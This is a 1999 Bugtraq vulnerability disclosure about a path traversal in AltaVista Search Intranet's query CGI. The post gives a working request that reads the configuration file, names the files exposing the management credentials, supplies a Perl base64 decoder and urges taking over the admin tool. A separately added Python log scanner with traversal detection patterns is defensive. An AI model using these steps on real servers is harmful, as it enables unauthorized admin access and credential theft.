Bugtraq Archives: AltaVista


Subject: AltaVista
From: rudi carell (rudicarellHOTMAIL.COM)
Date: Wed Dec 29 1999 - 08:52:46 CST


good morning folks,

... "With AltaVista Search Software, you can create your own search and
retrieval Web site with the same relevancy, performance, and efficiency of
the powerful AltaVista Search engine (www.altavista.com) used to index the
World Wide Web" ...

yes that's true .. but,

if you take a closer look at its functionality and file structure you will
find some interesting things:

the template-variable: {mss} in the main search function (cgi-bin/query?)
allows you one traversal step back and shows you any file in the
"http - directory".

example: http://we.loverudi.org:9000/cgi-bin/query?../config

if you try to go more than one directory back the program escapes {mss} with
"../" ...

nice try .. but much too late .. the http directory contains some very
interesting files:

../config ( Var "MGMT_PW=[ Plaintext MGMT-password ]" )
../logs/mgtstate ( passw=[ encoded mgt-password ] .. NOT the MGMT-password !!!)
../logs/stats.log ( sometimes stats_log )
../logs/access.log ( sometimes access_log )

forget everything but the "mgtstate" file .. it contains the username:password
for the online-config tool ( http://we.loverudi.org:9000/cgi-bin/mgt ) in the
form:

passw=[ encoded user:password string ]

pfft .. these guys are really smart .. they encode their passwords ...
( base64 :)

now we need a prg/script to decode the user/password - string

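---cut here---

#!/usr/bin/perl
# decode the base64 string from the passw= line, passed as the first argument
use strict;
use warnings;
use MIME::Base64;
print decode_base64($ARGV[0]), "\n";

---cut here---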

thank you ...

then start(goto) the online config tool ( http://we.loverudi.org:9000/cgi-bin/mgt )
and do whatever you want ... aso aso aso

have a nice Y2K-BUG

rudicarellhotmail.com

other infos:

vulnerable: altavista search intranet 2.??
type: Input Validation Error
object: query?
remote: yes
vendor: altavista (got informed ~3 months ago)




This archive was generated by hypermail 2b27 : Wed Dec 29 1999 - 19:38:03 CST
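
Added example, not part of the original post: a log check a defender could run to find requests of the kind described above in a web server access log and see whether one of the files the post names was requested. It assumes Common Log Format and goes slightly beyond the post by percent-decoding the query string first; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: Common Log Format; the post does not show the product's log layout.
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
# A ".." segment at the start of the query string or after / = &
TRAVERSAL = re.compile(r'(?:^|[/=&])\.\.(?:/|$)')
# Files the post lists as readable one level above the template directory.
SENSITIVE = {"config", "logs/mgtstate", "logs/stats.log", "logs/stats_log",
             "logs/access.log", "logs/access_log"}

def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so encoded and double-encoded dots are seen."""
    for _ in range(rounds):
        s, prev = unquote(s), s
        if s == prev:
            break
    return s.replace("\\", "/")

def classify(line):
    """Return a finding for a traversal request to cgi-bin/query, else None."""
    m = CLF.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    query = decode_fully(query)
    if not path.endswith("/cgi-bin/query") or not TRAVERSAL.search(query):
        return None
    wanted = query.rsplit("../", 1)[-1]  # what remains after the last "../"
    return {"ip": m["ip"], "time": m["ts"], "file": wanted,
            "sensitive": wanted in SENSITIVE,
            "served": m["status"] == "200"}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges, made-up timestamps and sizes).
SAMPLE = [
    '192.0.2.10 - - [29/Dec/1999:08:01:02 -0600] "GET /cgi-bin/query?pg=q&q=intranet+policy HTTP/1.0" 200 5120',
    '198.51.100.7 - - [29/Dec/1999:08:03:11 -0600] "GET /cgi-bin/query?../config HTTP/1.0" 200 812',
    '198.51.100.7 - - [29/Dec/1999:08:03:15 -0600] "GET /cgi-bin/query?%2e%2e%2flogs/mgtstate HTTP/1.0" 404 0',
    '198.51.100.7 - - [29/Dec/1999:08:03:20 -0600] "GET /cgi-bin/query?../../docs/readme HTTP/1.0" 404 0',
    '192.0.2.10 - - [29/Dec/1999:08:05:40 -0600] "GET /cgi-bin/query?pg=q&q=v1..v2 HTTP/1.0" 200 4300',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["time"], f["ip"], f["file"], "served" if f["served"] else "not served")
```

A finding with both `sensitive` and `served` set means the management password should be treated as disclosed and changed.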